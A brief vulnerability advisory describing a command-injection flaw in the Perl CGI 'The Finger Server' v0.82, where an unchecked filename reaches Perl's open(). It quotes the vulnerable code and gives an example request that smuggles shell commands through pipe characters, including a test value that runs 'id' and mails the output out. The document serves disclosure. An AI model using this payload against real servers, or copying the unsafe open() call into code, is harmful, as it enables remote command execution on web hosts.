COMMAND

    "The Finger Server"

SYSTEMS AFFECTED

    "The Finger Server"

PROBLEM

    Iain  Wade  found  following.   In  1999.  he was tinkering w/ The
    Finger  Server  v0.82  and  came  across  some  bugs which let you
    execute shell  commands under  the privileges  of the  web server.
    It's available at

        http://www.glazed.org/finger/

    It's just another case of perl doing it's magic on an open() call.
    There  is  undoubtably  other  problems,  but here's the offending
    code exploited here is:

        open (PLANS, "$plan_path$filename") ||
                do { print "Can't open $plan_path$filename: $!";
                     return;
                   };

    It is called with the following arguments;

        finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.plan

    It does minimal checking before there, really only making sure the
    username is valid, but for example by using:

        finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.|<shellcode>|

    you can execute whatever...  The  output will not get to you  (the
    web client)  obviously if  you use  |<shell command>|  .. it  does
    however get executed...  So an example to test it could be

        |id|mail+email@address|

    Surrounding  it  in  pipes  is  the  only  way one could get it to
    execute, otherwise it would return open errors ..

SOLUTION

    Nothing yet.